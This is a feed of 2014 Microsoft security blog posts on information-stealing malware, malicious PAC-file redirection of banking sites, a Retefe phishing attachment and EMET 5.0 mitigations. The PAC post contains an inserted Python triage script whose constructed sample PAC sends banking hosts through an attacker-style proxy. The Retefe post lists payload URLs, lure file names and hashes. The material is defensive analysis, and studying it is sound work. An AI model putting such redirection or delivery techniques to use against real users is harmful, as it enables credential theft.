Additionally, the C&amp;C server responses, if we are to trust the response headers, indicate that some web servers use an old version, 1.1.19, of <a href="http://wiki.nginx.org/Main">Nginx</a>, which is also from 2011. Lastly, you can use <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a> and <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a> to detect and remove both the Sefnit malware and the configuration files.</p> <p><em>Dmitriy Pletnev</em></p> <p><em>MMPC</em></p> </div> <h2><a href="http://blogs.msdn.com/b/sdl/archive/2014/03/05/life-in-the-digital-crosshairs-the-untold-story.aspx">Life in the digital crosshairs: the untold story</a></h2> <p><em>Wed, 05 Mar 2014 17:00:00 GMT, SDL Team</em></p> <p>To mark the 10-year anniversary of the creation of the Security Development Lifecycle, we wanted to tell the behind-the-scenes story of how the SDL came to be.</p> <p>Back in 2004, Microsoft decided that if we were going to succeed at building trust with our customers, security could not be an afterthought when developing our products and services.</p> <p>So how do you get a large organization like Microsoft to prioritize security with thousands of developers writing millions of lines of code? 
How do you get everyone marching toward the same goal?</p> <p>Hear from some of the people behind the scenes in security at Microsoft as they discuss their journey and how they helped to fundamentally shift the culture within Microsoft.</p> <p>Get the never-before-told inside story on Microsoft security: <a href="http://www.sdlstory.com">www.sdlstory.com</a></p> <p><a href="http://www.sdlstory.com"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3568.sdl_2D00_10yr_2D00_twitter_2D00_440x220_2D00_1.jpg" alt="" border="0" /></a></p> <h2><a href="http://blogs.technet.com/b/mmpc/archive/2014/03/03/pc-health-part-1-information-stealing-malware.aspx">PC health – Part 1: Information stealing malware</a></h2> <p><em>Tue, 04 Mar 2014 00:13:34 GMT, msft-mmpc</em></p> <div class="ExternalClassDA13689EF19149E9BD5759CC1FC6FD42"> <p>When we were building Windows 8, MMPC partnered with several teams in Microsoft to start the PC Health program. The PC Health program has two goals:</p> <ul> <li>To inform and guide customers on additional actions to take when malware might have put their information at risk</li> <li>To monitor the health of PCs running our antimalware products and initiate remediation as required</li> </ul> <p>We&rsquo;ll discuss the PC Health program in this two-part blog. 
Part 1 focuses on the first goal: informing and guiding our customers to take additional action when malware might have put their information at risk.</p> <h3>Information stealing malware</h3> <p><strong>Background and Landscape</strong></p> <p>During 2013, nearly 24 million machines running Microsoft security products encountered information-stealing malware. We estimate that these threats stole user names and passwords, developer code-signing keys, and other data from 4.86M machines. This figure includes malware that ran but may not have stolen any data.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PC1.png"> <img width="500" alt="Information stealing malware graph" src="http://www.microsoft.com/security/portal/blog-images/a/PC1.png" border="0" /></a></p> <p><em>Figure 1: Monthly count of machines with an active infection by information-stealing malware. Families include <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=Win32/Gamarue">Gamarue</a>, <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=Win32/Dorkbot">Dorkbot</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Zbot">Zbot</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Banker">Banker</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Bancos">Bancos</a>, and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Fareit">Fareit</a>.</em></p> <h3>What can we do to better protect these customers?</h3> <p>First, as part of our malware research and automation, we continue to reduce the malware time-to-live; that is, we aim to reduce the time between when malware is released into the wild and when we start detecting it. 
However, it is also important to inform and appropriately guide our customers to take action and mitigate the impact of information-stealing malware.</p> <p><strong>Inform and guide: mitigating the impact of information-stealing malware</strong></p> <p>Since 2012 and the release of Windows 8, if you&rsquo;re running Microsoft Security Essentials or Windows Defender and information-stealing malware gets onto your machine, you might see a message similar to this in Windows Action Center:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PC2.jpg"><img width="500" alt="Action center alert" src="http://www.microsoft.com/security/portal/blog-images/a/PC2.jpg" border="0" /></a></p> <p><em>Figure 2: Windows Action Center message if your machine gets infected by Zbot</em></p> <p>We know from our research that, for example, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Zbot">Zbot</a> is a malware family known to target user credentials for online banking websites. The message above will appear if your Microsoft antivirus product has detected and removed the threat. However, this message takes recovery one step further: it advises you to change your passwords for the websites the malware is known to target.</p> <p>In 2013, a message like this was seen by more than 260,000 users within six months.</p> <p>If you are running System Center Endpoint Protection or Windows Intune, we communicate this information through the event log channel. The administrator can use the information in the event log to determine if the malware ran on the machine. If the malware did run, the event log also contains a link to a description of the threat in our <a href="http://www.microsoft.com/security/portal/threat/Threats.aspx">malware encyclopedia</a>. 
From there, the admin can assess and take action if the malware exhibits information-stealing behavior.</p> <h3>What do our customers think about this approach?</h3> <p>To determine if customers found this valuable, we monitored user feedback about the Windows Action Center notifications for three months. We received more than three thousand reviews with a 90 percent satisfaction rate.</p> <h3>Further investments</h3> <p>With the release of Windows 8, your Microsoft account can be used as the primary login across your Windows devices and services (such as OneDrive and Hotmail). To better secure your Microsoft account, we provide the Microsoft Accounts team with the PC Health information, which includes information-stealing malware encounters.</p> <p><em>Deepak Manohar and Ina Ragragio</em><br /><em>MMPC</em></p> </div> <h2><a href="http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-config-redirection.aspx">Malicious Proxy Auto-Config redirection</a></h2> <p><em>Fri, 28 Feb 2014 09:59:00 GMT, msft-mmpc</em></p> <div class="ExternalClassB716B63D40B849079E48EADE19F0CC3C"> <p>Internet banking credentials are a desirable target for cybercriminals. They can be targeted with man-in-the-middle attacks or through password-stealing trojans such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/Fareit">Fareit</a>, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/Zbot">Zbot</a> or <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?name=Win32/Banker">Banker</a>. 
A less well-known method of gaining unauthorized access to a user&rsquo;s banking credentials, commonly found in South America and to a lesser extent in Russia, is through malicious <a href="http://technet.microsoft.com/en-us/library/dd361918.aspx">Proxy Auto-Config</a> (PAC) files. Normally, PAC files offer functionality similar to the <a href="http://technet.microsoft.com/en-us/library/cc751132.aspx">hosts</a> file, allowing IP/website redirection, but only for the browser. Unfortunately, they can also be used for nefarious purposes.</p> <p>When a user is infected with a malicious PAC and visits an internet banking website, the browser is usually redirected to a fake website that mimics the intended banking website. This may result in credentials being stolen, or worse, online account hijacking.</p> <p>The most common infection scenario is shown in figure 1 below:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/PAC1.jpg"><img width="500" alt="Common infection scenario" src="http://www.microsoft.com/security/portal/blog-images/a/PAC1.jpg" border="0" /></a></p> <p><em>Figure 1: A common PAC infection scenario</em></p> <p>A user is infected through a drive-by attack or by other malware, and a malicious PAC file is installed onto their computer. When the victim visits a targeted website, their browser is redirected to a fake website that records their login details. 
The infection is silent: the user is not notified of the change in configuration (see figure 5).</p> <p>Our telemetry shows that the following country domains are the most targeted by malicious PAC files:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Pac2.png"> <img width="500" alt="Infection telemetry" src="http://www.microsoft.com/security/portal/blog-images/a/PAC2.png" border="0" /></a></p> <p><em>Figure 2: Countries most targeted by malicious PACs</em></p> <p>Analysis of the malicious PAC files shows that cybercriminals mostly target banking websites in Brazil and Russia, but many attacks are not limited to online banking entities. We have also seen malicious redirection against other targets, such as credit card services, e-mail providers, social networking websites, antivirus products and educational institutions. Our <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanProxy:JS/Banker.gen%21A#tab=2">TrojanProxy:JS/Banker.gen!A</a> description has a detailed list of the targeted entities.</p> <p>One important user-side mitigation comes directly from the browser. What a user would experience when browsing the real website, and then the redirected one, is shown below:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Pac3.jpg"> <img width="500" alt="browser unsecure" src="http://www.microsoft.com/security/portal/blog-images/a/Pac3.jpg" border="0" /></a></p> <p><em>Figure 3: Web page without PAC redirection</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/pac4.jpg"> <img width="500" alt="browser secure" src="http://www.microsoft.com/security/portal/blog-images/a/Pac4.jpg" border="0" /></a></p> <p><em>Figure 4: Web page with malicious PAC redirection</em></p> <p>You can see above that the original website has an authenticated certificate and appears with a green address bar. 
The original website is also using HTTPS (secure communication).</p> <p>Any PAC file installation (legitimate or otherwise) can be manually checked in Internet Explorer by opening the Tools menu, selecting Internet Options, clicking the Connections tab, and selecting LAN Settings. If you see something similar to the following picture and you didn&rsquo;t install a PAC file, then you might be infected. Keep in mind that the PAC file can also be installed from the internet (using an http:// address), not only as a local file.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/pac5.jpg"> <img width="500" alt="PAC installed" src="http://www.microsoft.com/security/portal/blog-images/a/PAC5.jpg" border="0" /></a></p> <p><em>Figure 5: LAN settings showing a PAC file installed</em></p> <p>Deleting (or disabling) the entry under &ldquo;Use automatic configuration script&rdquo;, and removing the local file it references, can help mitigate an attack.</p> <p>In order to deal with these malicious PAC files we have added several detections, such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanProxy:JS/Banker.AC#tab=2">TrojanProxy:JS/Banker.AC</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanProxy:JS/Banker.gen%21A#tab=2">TrojanProxy:JS/Banker.gen!A</a>, and we will continue adding detections for any malicious PAC files we find in the wild. 
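A first-pass triage of a PAC file of the kind described above, added here as an example (not the post's code): it extracts which host patterns are sent through a proxy while everything else goes DIRECT, and reads the PAC URL Internet Explorer is configured with. The sample PAC is constructed for the demonstration with documentation-only names and addresses; obfuscated PAC files need a JavaScript engine instead.

```python
"""First-pass triage of a PAC file of the kind described in the post.
Added example, not the post's code. Handles hand-written PAC syntax only;
an obfuscated PAC needs a JavaScript engine. SAMPLE_PAC is constructed."""
import re

# One rule: if (<host tests>) [{] return "<action>";  (braces optional)
_RULE = re.compile(
    r'if\s*\((?P<cond>[^{}]*?)\)\s*\{?\s*return\s*"(?P<action>[^"]*)"\s*;', re.S)
# Host tests common in PAC files: shExpMatch/dnsDomainIs(host, "...") or host == "..."
_HOST_TEST = re.compile(
    r'(?:shExpMatch|dnsDomainIs)\s*\(\s*host\s*,\s*"([^"]+)"\s*\)|host\s*==\s*"([^"]+)"')

SAMPLE_PAC = r'''
// Constructed sample with the shape of a redirecting PAC file; documentation-only names.
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.bank-example.test") ||
        dnsDomainIs(host, ".pagamentos-example.test") ||
        host == "www.mail-example.test")
        return "PROXY 203.0.113.10:80";
    if (shExpMatch(host, "*.intranet.example"))
        return "DIRECT";
    return "DIRECT";
}
'''


def pac_rules(pac_source):
    """[(host_pattern, action), ...] for every host test that leads to a return."""
    rules = []
    for m in _RULE.finditer(pac_source):
        action = " ".join(m.group("action").split())
        for fn_pattern, eq_pattern in _HOST_TEST.findall(m.group("cond")):
            rules.append((fn_pattern or eq_pattern, action))
    return rules


def proxied_hosts(pac_source):
    """Host patterns the PAC diverts through a PROXY/SOCKS instead of DIRECT."""
    return [(h, a) for h, a in pac_rules(pac_source)
            if not a.upper().startswith("DIRECT")]


def triage(pac_source):
    """Summary for a responder: the fall-through action and what is diverted.
    A PAC that proxies a few named sites and sends everything else DIRECT
    matches the banking redirection pattern the post describes."""
    returns = re.findall(r'return\s*"([^"]*)"', pac_source)
    default = " ".join(returns[-1].split()) if returns else None
    proxied = proxied_hosts(pac_source)
    return {
        "default_action": default,
        "proxied": proxied,
        "selective_redirect": bool(proxied) and default is not None
                              and default.upper().startswith("DIRECT"),
    }


def configured_pac_url():
    """On Windows, the PAC URL Internet Explorer is using (the value behind the
    LAN Settings dialog in Figure 5); None elsewhere or when not configured."""
    try:
        import winreg
    except ImportError:
        return None
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
            return winreg.QueryValueEx(key, "AutoConfigURL")[0]
    except OSError:
        return None


if __name__ == "__main__":
    print("configured PAC URL:", configured_pac_url() or "(none, or not Windows)")
    for host, action in proxied_hosts(SAMPLE_PAC):
        print(f"{host:32} -> {action}")
    print(triage(SAMPLE_PAC))
```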
To better protect yourself against these threats, we recommend installing an up-to-date real-time security product, such as Microsoft Security Essentials.</p> <p><em>MMPC Munich</em></p> </div> <h2><a href="http://blogs.technet.com/b/mmpc/archive/2014/02/27/a-close-look-at-a-targeted-attack-delivery.aspx">A close look at a targeted attack delivery</a></h2> <p><em>Thu, 27 Feb 2014 15:00:00 GMT, msft-mmpc</em></p> <div class="ExternalClassEEDECD50DB8A4254AC8D4D6B095194FE"> <p>For antimalware products, targeted attacks represent a very interesting class of malware. They are stealthy and only target specific organizations and industries, flying under the radar when it comes to identifying new malware files based on telemetry. 
The purpose of these attacks is most commonly to steal confidential and sensitive information by means of social engineering and unpatched, vulnerable software.</p> <p>We recently investigated a sample used in this kind of attack, <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Retefe.A#tab=1">Trojan:Win32/Retefe.A</a>, and wanted to share with you what we encountered and possible ways to avoid being infected by similar approaches.</p> <p>Our analysis began when we investigated an RTF document flagged as suspicious due to its inclusion in what looked like a phishing email:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target1.jpg"> <img width="500" alt="Suspicious RTF doc" src="http://www.microsoft.com/security/portal/blog-images/a/Target1.jpg" border="0" /></a></p> <p><em>Figure 1: RTF document attached to phishing email</em></p> <p>The email sender was spoofed by the attackers to appear as a large e-commerce company. The message is in German and translates as &ldquo;The receipt, from your Zalando Switzerland team&rdquo;. Another reason for flagging the email as phishing was the sentence structure &ndash; it seems to be the result of an automated translation tool.</p> <p>When a user attempts to open the RTF document they get the following warning from Outlook:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target2.jpg"> <img width="500" alt="Outlook warning" src="http://www.microsoft.com/security/portal/blog-images/a/Target2.jpg" border="0" /></a></p> <p><em>Figure 2: An attempt to open the RTF prompts an Outlook warning</em></p> <p>At this point we were thinking that the RTF might contain a vulnerability that would be triggered when opening the file. 
However, when it was opened the document showed no indication that it contained an exploit &ndash; it just displayed a small document:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target3.jpg"> <img width="500" alt="small document" src="http://www.microsoft.com/security/portal/blog-images/a/Target3.jpg" border="0" /></a></p> <p><em>Figure 3: The attachment opens a small document</em></p> <p>Again the text is in German and translates as &ldquo;To see the receipt, double click on the image&rdquo;. At this point it was obvious we were dealing with a social engineering attack: the attacker is asking the victim to willingly execute the malware on their machine. Even at this point the user would see a warning message about the risks of executing an unknown attachment:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target4.jpg"> <img width="500" alt="Warning message" src="http://www.microsoft.com/security/portal/blog-images/a/Target4.jpg" border="0" /></a></p> <p><em>Figure 4: Security warning when attempting to open a suspicious attachment</em></p> <p>The file, which is executed if the user proceeds and clicks Open, is a Control Panel Applet (CPL). Its purpose is to establish a network connection to a malicious server and download the payload file. 
This particular CPL file tried to download its payload from <em>www.ent&lt;removed&gt;.ch/n.exe</em>.</p> <p>At the time of our investigation the file was no longer available, but since this was not the only attempt the bad guys have made, we were able to retrieve the payload from a URL used in similar attacks: <em>www.&lt;removed&gt;-club.ch/n.exe</em></p> <p>We detect the payload as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Retefe.A#tab=1">Trojan:Win32/Retefe.A</a>.</p> <p>The file name of the RTF document is not consistent throughout all attacks. We have seen other names that follow patterns similar to those below:</p> <ul> <li>2379F939.rtf</li> <li>O442Z4nV.rtf</li> <li>Quittung 05-02.14.rtf</li> <li>Quittung 2014.05.02.rtf</li> <li>uozohS+K.rtf</li> <li>uvsWuIaY.rtf</li> <li>vMtz+mFA.rtf</li> <li>YdBoUSiG.rtf</li> <li>YgRUlKut.rtf</li> </ul> <p>We&rsquo;ve also observed variations where the RTF document was replaced by a .DOC file following the same infection strategy. The file names used are similar, for example:</p> <ul> <li>Quittung 2014.05.02.doc</li> <li>Quittung 05-02.14.doc</li> <li>unnamed.doc</li> </ul> <p>The document can also be embedded in an archive from which the user needs to extract the .RTF or .DOC file. Example file names include:</p> <ul> <li>A1 Rechnung #13784126 von 05-02-2014.zip</li> <li>A1 Rechnung #746537 von 050214.zip</li> <li>Ihre Bestellung #83919469 vom 03022014.zip</li> <li>Ihre Bestellung N9397351 vom 0402-14.zip</li> </ul> <p>Trojan:Win32/Retefe.A also displays a window in which it informs the user that they need to install an &ldquo;update&rdquo; and advises them to click &ldquo;Yes&rdquo; when the UAC window is displayed. 
This is another layer of social engineering to trick the user and avoid making them suspicious. The message even shows which button to press in the UAC prompt, and can appear in English or German depending on the computer locale.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target5c.png"> <img alt="English" src="http://www.microsoft.com/security/portal/blog-images/a/Target5c.png" border="0" /></a></p> <p><em>Figure 5: Further social engineering from Trojan:Win32/Retefe.A advises the user to run the malware</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Target6.jpg"> <img width="500" alt="Engineering script" src="http://www.microsoft.com/security/portal/blog-images/a/Target6.jpg" border="0" /></a></p> <p><em>Figure 6: The strings encountered in the binary of the social engineering message</em></p> <p>As shown above, threats such as Trojan:Win32/Retefe.A use multiple techniques to encourage users to run the malicious file. The user also receives numerous warnings about the danger of proceeding. Despite these warnings we still have reports of this threat running on machines, primarily in German-speaking countries. Running an up-to-date, real-time security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>, can help protect your PC from this type of malicious threat. However, the best form of defence is to prevent these malicious files from running in the first place. 
The easiest way to do this is to educate users on the risk of opening unsolicited email attachments and on <a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">recognising a phishing email</a>.</p> <p><strong>Reference files:</strong></p> <p>Downloaded file:</p> <ul> <li>SHA1: 0e832c750e445484494923ce5e2e385cc73a4df1</li> <li>MD5: aa19c341970a39bac50eabf634b6262d</li> <li>Detected: Trojan:Win32/Retefe.A</li> </ul> <p>CPL file:</p> <ul> <li>SHA1: 3b86362334fce7e339f2fd36901eb30043b9481d</li> <li>MD5: 26e2ef85182c0e14a90e1108ab6f644f</li> <li>Detected: TrojanDownloader:Win32/Retefe.A</li> </ul> <p><em>MMPC Munich</em></p> </div> <h2><a href="http://blogs.technet.com/b/srd/archive/2014/02/25/announcing-emet-5-0-technical-preview.aspx">Announcing EMET 5.0 Technical Preview</a></h2> <p><em>Tue, 25 Feb 2014 17:32:20 GMT, swiat</em></p> <p><span>Today, we are thrilled to announce a preview release of the next version of the Enhanced Mitigation Experience Toolkit, better known as EMET. You can download EMET 5.0 Technical Preview <a href="http://www.microsoft.com/emet">here</a>. This Technical Preview introduces new features and enhancements that we expect to be key components of the final EMET 5.0 release. We are releasing this Technical Preview to gather customer feedback about the new features and enhancements. Your feedback will affect the final EMET 5.0 technical implementation. We encourage you to download this Technical Preview, try it out in a test environment, and let us know how you would like these features and enhancements to show up in the final version. 
If you are in San Francisco, California, for the <a href="http://www.rsaconference.com/events/us14"><span style="color:#0563c1;">RSA Conference USA 2014</span></a>, please join us at the Microsoft booth (number 3005) for a demo of EMET 5.0 Technical Preview and give us feedback directly in person.&nbsp; Several members of the EMET team will be demonstrating at the Microsoft booth for the entire Conference.</span></p> <p><span>As mentioned, this Technical Preview release implements new features to disrupt and block the attacks that we have detected and analyzed over the past several months. The techniques used in these attacks have inspired us with new mitigation ideas to disrupt exploitation and raise the cost to write reliable exploits. The EMET 5.0 Technical Preview also implements additional defensive mechanisms to reduce exposure from attacks.</span></p> <p><span>The two new features introduced in EMET 5.0 Technical Preview are the <b>Attack Surface Reduction (ASR)</b> and the <b>Export Address Table Filtering Plus (EAF+)</b>. Similar to what we have done with EMET 3.5 Technical Preview, where we introduced a new set of mitigations to counter Return Oriented Programming (ROP), we are introducing these two new mitigations and ask for your feedback on how they can be improved. 
Of course, they are a &ldquo;work in progress.&rdquo; Our goal is to have them polished for the final version of EMET 5.0.</span></p> <p><span>Let&rsquo;s see in detail what these two new mitigations do, and the reasoning that led us to their implementation.</span></p> <p><span><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2555.pic1.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2555.pic1.png" border="0" /></a></span></p> <h2>Attack Surface Reduction</h2> <p style="margin:0in 0in 8pt;"><span>In mid-2013, <a href="http://support.microsoft.com/kb/2751647"><span style="color:#0563c1;">we published a Fix it solution</span></a> to disable the Oracle Java plug-in in Internet Explorer. We received a lot of positive feedback and a number of suggestions on how we could improve the Fix it. The most recurring suggestion we received was to allow the Oracle Java plug-in on intranet websites, which commonly run Line-of-Business applications written in Java, while blocking it on Internet Zone websites. In addition to that Java-related customer feedback, we have also seen a number of exploits targeting the Adobe Flash Player plug-in. For example, the <a href="http://news.cnet.com/8301-27080_3-20051071-245.html"><span style="color:#0563c1;">RSA breach was enabled by an Adobe Flash Player exploit</span></a> embedded inside a Microsoft Excel file and a number of targeted attacks have been carried out by Adobe Flash Player exploits embedded in Microsoft Word documents, as described by <a href="https://citizenlab.org/2014/02/mapping-hacking-teams-untraceable-spyware/"><span style="color:#0563c1;">Citizen Lab</span></a>. We decided to design a new feature that can be used to mitigate similar situations and to help to reduce the attack surface of applications. 
We call this feature Attack Surface Reduction (ASR), and it can be used as a mechanism to block the usage of specific modules or plug-ins within an application. For example, you can configure EMET to prevent Microsoft Word from loading the Adobe Flash Player plug-in, or, with the support of <a href="http://msdn.microsoft.com/en-us/library/ie/ms537183(v=vs.85).aspx#zones"><span style="color:#0563c1;">security zones</span></a>, you can use EMET to prevent Internet Explorer from loading the Java plug-in on an Internet Zone website while continuing to allow Java on Intranet Zone websites.</span></p> <p style="margin:0in 0in 8pt;"><span>The example below shows ASR in action, preventing Microsoft Word from launching an Adobe Flash Player file embedded in the document. By default, EMET 5.0 Technical Preview comes pre-configured to block certain plug-ins from being loaded by Internet Explorer, Microsoft Word and Microsoft Excel. The feature is fully configurable by changing two registry keys that list the names of the plug-ins to block and, where the application supports security zones, the zones that are allowed as exceptions. For more details on how to configure ASR, please refer to the EMET 5.0 Technical Preview <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41963" target="_blank">user guide</a>.</span></p> <p style="text-align:center;"><span><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2728.pic2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/2728.pic2.png" border="0" /></a></span></p> <h2>EAF+</h2> <p><span>We also added new capabilities to the existing Export Address Table Filtering (EAF). EAF+ consolidates protection of lower-level modules and prevents certain exploitation techniques used to build dynamic ROP gadgets in memory from export tables. 
EAF+ can be enabled through the &ldquo;Mitigation Settings&rdquo; ribbon. When EAF+ is enabled, it will add the following additional safeguards over-and-above the existing EAF checks:</span></p> <ul> <li> <p><span>Add protection for KERNELBASE exports in addition to the existing NTDLL.DLL and KERNEL32.DLL</span></p> </li> <li> <p><span>Perform additional integrity checks on stack registers and stack limits when export tables are read from certain lower-level modules</span></p> </li> <li> <p><span>Prevent memory read operations on protected export tables when they originate from suspicious modules that may reveal memory corruption bugs used as &ldquo;read primitives&rdquo; for memory probing</span></p> </li> </ul> <p><span>For example, the third protection mechanism in the list above mitigates the exploitation technique developed in Adobe Flash Player used in some recent Internet Explorer exploits (CVE-2013-3163 and CVE-2014-0322), where the attacker attempted to build ROP gadgets by scanning the memory and parsing DLL exports using ActionScript code. Exploits for these vulnerabilities are already blocked by other EMET mitigations. EAF+ provides another way to disrupt and defeat advanced attacks. The screenshot below shows the exploit for CVE-2014-0322 in action on Internet Explorer protected by EMET 5.0 Technical Preview with only EAF+ enabled.<br /></span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0876.pic3.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0876.pic3.png" border="0" /></a></p> <h2>Other improvements</h2> <p><span>This Technical Preview enables the &ldquo;Deep Hooks&rdquo; mitigation setting. We have been working with third-party software vendors whose products do not run properly with Deep Hooks enabled. 
We believe these vendors have resolved the application compatibility issues that previously existed with Deep Hooks enabled. We enable Deep Hooks in the Technical Preview to evaluate the possibility of having this setting turned on by default in the final EMET 5.0 release because it has proven to be effective against certain advanced exploits using ROP gadgets with lower level APIs. We have also introduced some additional hardening to protect EMET&rsquo;s configuration when loaded in memory, and fixed several application compatibility issues including a common one that involves Adobe Reader and the &ldquo;MemProt&rdquo; mitigation.</span></p> <h2>Acknowledgments</h2> <p><span>We&rsquo;d like to thank Spencer J. McIntyre from SecureState, Jared DeMott from Bromium Labs, along with Peleus Uhley and Ashutosh Mehra from the Adobe Security team <span style="line-height:107%;">for their collaboration on the EMET 5.0 Technical Preview</span>.</span></p> <p><span>We are excited for this Technical Preview and we hope that the additions are as valuable for our customers as they are for us. We invite you to install and give EMET 5.0 Technical Preview a try; we look forward to hearing your feedback and suggestions on how to enhance the new features that we have introduced. We would also welcome any suggestions for additional new features you&rsquo;d like to see included in the final version of EMET 5.0. We greatly value the feedback we receive, and we want to build a product that not only provides additional protection to systems but is also easy to use and configure. 
We invite you all to download <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">EMET 5.0 Technical Preview</span></a> and <a href="mailto:emet_feedback@microsoft.com"><span style="color:#0563c1;">drop us a line</span></a>!</span></p> <ul> <li> <p><span>The EMET Team</span></p> </li> </ul> <p>Categories: EMET</p> <h1>Announcing the Enhanced Mitigation Experience Toolkit (EMET) 5.0 Technical Preview</h1> <p><a href="http://blogs.technet.com/b/msrc/archive/2014/02/25/announcing-the-enhanced-mitigation-experience-toolkit-emet-5-0-technical-preview.aspx">http://blogs.technet.com/b/msrc/archive/2014/02/25/announcing-the-enhanced-mitigation-experience-toolkit-emet-5-0-technical-preview.aspx</a><br />Tue, 25 Feb 2014 17:30:00 GMT<br />Chris Betz</p> <p>I&rsquo;m here at the Moscone Center, San Francisco, California, attending the annual <a href="http://www.rsaconference.com/events/us14"><span style="color:#0563c1;">RSA Conference USA 2014</span></a>. There&rsquo;s a great crowd here and many valuable discussions. Our Microsoft Security Response Center (MSRC) engineering teams have been working hard on the next version of EMET, which helps customers increase the effort attackers must make to compromise a computer system.</p> <p>I&rsquo;m happy to announce the public release of the <a href="http://www.microsoft.com/emet"><span style="color:#0563c1;">EMET 5.0 Technical Preview</span></a> today from the RSA exhibit hall.</p> <p>During last night&rsquo;s RSA reception, conference attendees got a sneak preview of EMET 5.0 as demonstrated by Jonathan Ness, Chengyun Chu, Elia Florio and Elias Bachaalany from our EMET engineering team. 
If you missed it, we&rsquo;ll have our EMET engineering team here all week at RSA demonstrating the current version of EMET 4.1, as well as the EMET 5.0 Technical Preview, at the Microsoft Booth (number 3005).</p> <p>EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and can help protect the computer by diverting, terminating, blocking and invalidating those actions and techniques. In recent 0-days, EMET has been an effective mitigation against memory corruption. Having EMET installed and configured on computers meant that the computers were protected from those attacks.</p> <p>EMET 5.0 Technical Preview adds new protections for enterprises on top of the <a href="http://technet.microsoft.com/en-us/security/jj653751"><span style="color:#0563c1;">12 built-in security mitigations</span></a> included in version 4.1. For instance, the new Attack Surface Reduction mitigation allows enterprises to better protect third-party and custom-built applications by selectively enabling Java, Adobe Flash Player and Microsoft or third-party plug-ins. At the Security Research and Defense blog, our engineering team provides a <a href="http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx"><span style="color:#0563c1;">deep dive blog post</span></a> on EMET 5.0 Technical Preview.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/8306.emet1.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/8306.emet1.jpg" border="0" /></a></p> <p>Since the first release of EMET in 2009, our customers and the security community have adopted EMET and provided us with valuable feedback. 
